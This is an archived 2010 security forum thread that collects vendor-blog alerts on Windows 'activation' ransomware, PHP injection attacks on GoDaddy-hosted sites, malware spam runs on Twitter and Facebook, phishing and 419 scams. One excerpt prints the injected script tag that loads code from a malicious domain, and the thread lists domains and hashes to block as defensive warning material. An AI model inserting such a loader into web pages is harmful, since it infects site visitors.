SPAM frauds, fakes, and other MALWARE deliveries - archive

Windows “activation” ransomware

FYI...

Windows “activation” ransomware
- http://sunbeltblog.blogspot.com/2010/05/windows-activation-ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)

:mad:
 
GoDaddy attacks continue...

FYI... 'suggest BLOCK THEM ALL...

- http://community.websense.com/blogs...ess-blog-got-injected-_2D00_-again_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/continuing-attacks-at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
May 12, 2010
___

- http://google.com/safebrowsing/diagnostic?site=kdjkfjskdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=holasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/safebrowsing/diagnostic?site=indesignstudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."

:fear::mad:
 
Last edited:
Twitter attack - in progress...

FYI...

Twitter attack - in progress...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."

:mad:
 
AutoRun worms still alive

FYI...

AutoRun worms still alive...
- http://blog.trendmicro.com/new-autorun-worms-utilize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-maximize-the-malware-protection-of-your-removable-drives/

:fear::fear:
 
FIFA fans - Scam targets

FYI...

FIFA fans - Scam targets
- http://blog.trendmicro.com/latest-online-scam-targets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.com/article/197056/FIFA_Tickets.html

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-spammers-raise-their-game
May 27, 2010

- http://www.f-secure.com/weblog/archives/00001964.html
June 9, 2010

:mad:
 
Last edited:
44 million stolen gaming credentials uncovered

FYI...

44 million stolen gaming credentials uncovered
- http://www.symantec.com/connect/blogs/44-million-stolen-gaming-credentials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-052013-2257-99

** http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99

:fear:
 
Credit union fraud via phish for U.S. Servicemen and Vets

FYI...

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec.com/connect/blogs/online-fraudsters-catch-us-servicemen-and-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."

:fear:
 
boingboing .com spews drive-by-download malware...

FYI...

boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html

:fear::mad:
 
Facebook attacked again...

FYI...

Facebook attacked again...
- http://community.websense.com/blogs.../most-hilarious-video-attack-on-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page look like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/05/28/facebook-spam-leads-to-viagra-vendor-drive-by-download/
May 28, 2010

- http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."

:fear::mad:
 
Last edited:
Top Web Malware in May...

FYI...

... Top Web Malware in May
- http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html
June 1, 2010 - "Some interesting stats from May.
• 16196 unique malicious domains.
• The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
• Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
• Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
• Gumblar was the second most prevalent Web malware encountered, at 7%.
• Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010
holasionweb .com* - 7%
www .sitepalace .com - 3%
losotrana .com* - 2%
indesignstudioinfo .com* - 2%
kdjkfjskdfjlskdjf .com* - 2%
easfindnex .org - 2%
findermar .org - 2%
76.73.33.109 - 2%
findrasup .org - 1%
zettapetta .com* - 1%
*Related to attacks against GoDaddy-hosted websites
Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2% "

:fear::fear:
 
Samsung Wave - infected microSD card

FYI...

Samsung Wave - infected microSD card
- http://www.engadget.com/2010/06/02/samsung-wave-shipping-with-infected-microsd-card/
June 2, 2010 - "Did you get a Samsung Wave today, or perhaps early last week? You might not want to connect it to your computer, just in case. We're hearing anecdotal reports that the 1GB microSD card shipped with certain German units includes a nasty surprise: it automatically installs the trojan Win32/Heur using the file "slmvsrv.exe"...
Update: Samsung HQ got in touch with MobileBurn to confirm the existence of the virus in shipping S8500 Wave handsets, but said that the outbreak was confined to the German market's initial production run and all other shipments are A-OK. Still, there's no harm in disabling autorun before connecting one to your PC, eh?"

:bomb:
 
FBI Spam ? ...

FYI...

FBI Spam ? ...
419 Scam Resurfaces with FBI SPAM
- http://blog.trendmicro.com/spammers-pose-as-fbi-to-send-out-scam-mail/
June 3, 2010 - "Cybercriminals have found yet another way to grab users’ attention. This time, they posed as members of the Federal Bureau of Investigation (FBI) from Washington D.C. to scam users with a spammed message... As in any other scam, the email sender posed as someone from a legitimate body in this attack. The sender claims to be from the FBI. The spam, meanwhile, informs the recipient that he/she is the beneficiary of US$10.5 million. The fake FBI representative then gives the recipient instructions to contact the head of the “Online Transfer Department” of the United Trust Bank London. The said head, urges the email, is the only person who can take responsibility for giving out the promised millions. It even advises the email recipient to strictly follow the instructions in order to make the claim. This, of course, is a hoax. For greater irony and to prove that cybercriminals will go for desperate measures to trick their victims, a note has even been added at the end. This informs the recipient of possible fraudsters who might attempt to deal with him/her. To avoid becoming a victim of such a scam, always pay attention to every detail in email messages you receive. One can easily distinguish what is real and what is fake via careful observation. All you need to do is to carefully observe..."

(Screenshot available at the URL above.)

:fear::fear:
 
Twitter malicious SPAM - password reset...

FYI...

Twitter malicious SPAM - password reset...
- http://community.websense.com/blogs...0/06/03/reset-your-twitter-password-spam.aspx
03 Jun 2010 07:18 PM - "Websense... has detected a spam posing as a Twitter Password Reset Notification. We have seen about 55,000 instances of this malicious spam email so far... The spam contains a link to a compromised Web site that, when clicked or pasted into the browser, prompts the user to download a malicious executable named password.exe. The executable turns out to be a rogue AV called Protection Center Safebrowser. What distinguishes this rogue AV from the others is that it actually displays on the user's desktop some of the malicious files it installs. This makes the attack notification more believable. The attack is detected as Trojan.Generic.Win32 (SHA:0b00649c14b96219dd080a0ce6492c4d04c7f45c) and is currently recognized by 19 of the 41 engines on Virus Total*..."
* http://www.virustotal.com/analisis/...eea78ba8a7fa2dd411e7a349d8381e9332-1275590333
File 204bec9018693bba6200c0280cf4366e9 received on 2010.06.03 18:38:53 (UTC)
Result: 19/41 (46.34%)

(Screenshots available at the Websense URL above.)

:mad::fear:
 
SPAM campaigns send millions...

FYI...

SPAM campaigns send millions of emails
- http://community.websense.com/blogs.../2010/06/07/spam-summary-of-last-weekend.aspx
7 Jun 2010 - "Websense... detected 3 spam campaigns with millions of emails...
• Confirm Twitter password, and Twitter security model setup ...
• Facebook account deactivated, or invited by somebody famous ...
• Outlook Setup Notification ...
The statistics... show that spam increased by 15,700 daily on average during the weekend, compared to work days..."

(Screenshots available at the URL above.)

:fear::fear::fear:
 
ZeuS SPAM attack spoofs IRS, Twitter, Youtube

FYI...

ZeuS SPAM attack spoofs IRS, Twitter, Youtube
- http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/
June 9, 2010 - "Criminals have launched an major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, this latest attack* appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services... Warner said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious**, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. These broad attacks usually are quite successful, and in the past they have been used to great effect by the same criminal gangs that have been stealing tens of millions of dollars from small to mid-sized businesses..."
* http://garwarner.blogspot.com/2010/06/irs-malware-notice-of-underreported.html
June 08, 2010

** http://www.virustotal.com/analisis/...58f274b3bc3b9edfaf96dcbaeb619cdc96-1276042845
File 1276042605.tax-statement.exe received on 2010.06.09 00:20:45 (UTC)
Result: 3/40 (7.50%)

:fear::mad:
 
SCAMS - Gulf oil spill ...

FYI...

SCAMS - Gulf oil spill ...
- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt058.shtm
06/09/2010 - "... The Federal Trade Commission... cautions consumers and businesses to be on the alert for fraudulent activity related to the explosion aboard the Deepwater Horizon drilling rig and the resulting spill – and to report their experiences to federal and state authorities. British Petroleum (BP) leased the rig, which was owned and operated by Transocean. The FTC says it’s likely that scammers will use e-mails, websites, door-to-door collections, flyers, mailings and telephone calls to make contact and solicit money. Some may claim they’re raising money for environmental causes or offer fraudulent services – like remediation services – related to the oil spill. Others may claim they can expedite loss claims for a fee. Still others may knock on your door and talk about placing booms or checking for oil on your property. Chances are they’re trying to gain your trust to get inside your home or get access to your personal information. The FTC says that at the very least, you will want to do some homework before making a donation or entering into an agreement for services..."
- http://www.ftc.gov/charityfraud/

(More detail at -both- FTC URLs above.)

Also see:
- http://www.avertlabs.com/research/b.../peering-into-the-affiliate-marketing-window/

- http://www.infosecurity-us.com/blog/2010/6/7/135-000-fake-youtube-pages-delivering-malware/168.aspx
June 7, 2010 - "... Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware... fake YouTube pages are well crafted and look almost identical to the real site. By using websites like YouTube, cyber criminals are taking advantage of a users’ inherent trust in the site and are able to infect more machines. Each page claims to have a “Hot Video” associated with anything from the Gulf Oil Spill to the NBA Playoffs. Google search results show 135,000 of these infected pages at the time of writing..."

:fear::mad::fear:
 
Last edited:
More World Cup scams, SPAM, etc...

FYI...

More World Cup scams, SPAM, etc...

- http://sunbeltblog.blogspot.com/2010/06/world-cup-visa-phishers-come-off-bench.html
June 14, 2010

- http://www.symantec.com/connect/blogs/fifa-world-cup-watch-all-matches-free-adult-video-site
June 13, 2010

- http://www.sophos.com/blogs/sophoslabs/?p=10015
June 11, 2010

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-and-cybercrime-end-user-survey
June 10, 2010- "... best practices:
• Don’t open unsolicited e-mails or social media messages purporting to contain special offers or extraordinary deals related to the World Cup, and especially don’t click on any links in such messages.
• If an online offer appears to be too good to be true, it probably is. Scammers often try to make their bogus offers sound so great that they would be nearly impossible to pass up…if they were real that is.
• Be careful about what “official” social networking accounts you follow, such as those that appear to be created by World Cup teams or players. Often, cybercriminals will create accounts posing to be someone they’re not.
• When searching for online video of the World Cup, avoid sites you’ve never heard of before and if you’re told you must update your media player before viewing a video, be very cautious as this might be a ploy by attackers to get you to download malware..."

- http://pandalabs.pandasecurity.com/extreme-sports-2010-fifa-world-cup-bhseo-attack/
06/9/10

:fear::fear:
 
Last edited:
Twitter - PDF exploit SPAM run... in progress

FYI...

Twitter - PDF exploit SPAM run... in progress
- http://sunbeltblog.blogspot.com/2010/06/pdf-exploit-spamrun-on-twitter.html
June 15, 2010 - "There appears to be a bit of a mad dash to infect people by the boatload on Twitter, with a variety of different messages being sent to random targets... account endlessly says “Wow, a marvelous product”. Click the link, and you might be redirected to some sort of paid movie service... If you’re unlucky, however, you’ll end up at a URL such as fqsmydkvsffz(dot)com/tre/vena(dot)html, where PDF exploits await... phrases used for this spamrun include:
Wow, An incredible Product
Wow, A shocking Discovery
Watch This
I Just Cant Beleive This
Wow, A stunning Product
Wow, A Revolutionary Product
Wow, A fascinating Site
This isn't the first malicious spamrun on Twitter, and it certainly won't be the last. With that in mind, it might be best to avoid random links sent to you from strangers. You never quite know what’s at the other end."

:fear::fear:
 
.gov site hosts Phish - UK banks

FYI...

.gov site hosts Phish - UK banks
- http://sunbeltblog.blogspot.com/2010/06/gov-website-plays-host-to-uk-banking.html
June 16, 2010 - "... something rather nasty on the Central Department .gov portal which can be found at central(dot)gov(dot)py... fourteen different banking / financial services phishes including Barclays, Abbey, Northern Rock, Halifax and Lloyds TSB. Clearly, someone is desperate to get their hands on as many UK banking credentials as possible. These phishes are all online at the moment although some appear to be flagged in browsers such as Firefox. We’ve contacted the hosts and hopefully all of the above will be offline shortly."

(Screenshots available at the Sunbelt blog URL above.)

:fear::mad:
 
You must log in or register to reply here.
Back
Top